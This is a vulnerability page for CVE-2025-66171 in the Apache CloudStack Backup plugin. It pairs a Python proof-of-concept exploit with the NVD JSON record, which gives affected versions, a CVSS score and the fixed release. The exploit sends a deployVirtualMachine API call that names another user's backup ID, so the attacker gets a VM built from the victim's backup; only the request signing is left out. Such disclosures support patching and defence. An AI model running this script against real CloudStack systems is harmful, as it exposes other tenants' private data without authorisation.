CVE-2025-66171

import requests # Exploit Title: Apache CloudStack Backup Plugin Privilege Escalation PoC # Date: 2025-05-08 # Vulnerable Version: 4.21.0.0, 4.22.0.0 TARGET_URL = "https://<cloudstack-ip>:<port>/client/api" API_KEY = "<attacker_api_key>" SECRET_KEY = "<attacker_secret_key>" # The victim's backup ID that the attacker wants to use VICTIM_BACKUP_ID = "<victim_backup_id>" def create_vm_from_stolen_backup(): """ Exploits the improper access logic to create a VM using another user's backup. """ payload = { "command": "deployVirtualMachine", "apiKey": API_KEY, "response": "json", "serviceofferingid": "<small_service_offering_id>", "zoneid": "<zone_id>", # Vulnerable parameter: specifying a backup ID owned by another user "backupid": VICTIM_BACKUP_ID } # Sign request logic omitted for brevity (standard CloudStack API signing) # signature = calculate_signature(payload, SECRET_KEY) # payload["signature"] = signature try: response = requests.get(TARGET_URL, params=payload, verify=False) if response.status_code == 200 and "virtualmachine" in response.text: print("[+] Exploit successful! VM created using victim's backup.") print(response.json()) else: print("[-] Exploit failed or invalid response.") print(response.text) except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": create_vm_from_stolen_backup()

{"cve": {"id": "CVE-2025-66171", "sourceIdentifier": "[email protected]", "published": "2026-05-08T13:16:35.483", "lastModified": "2026-05-12T13:31:00.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CloudStack Backup plugin has an improper access logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and have access to specific APIs can create new VMs using backups of any other user of the environment.\n\nBackup plugin users using CloudStack 4.21.0.0+ are recommended to upgrade to CloudStack version 4.22.0.1, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.21.0.0", "versionEndExcluding": "4.22.0.1", "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"}]}]}], "references": [{"url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/09/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}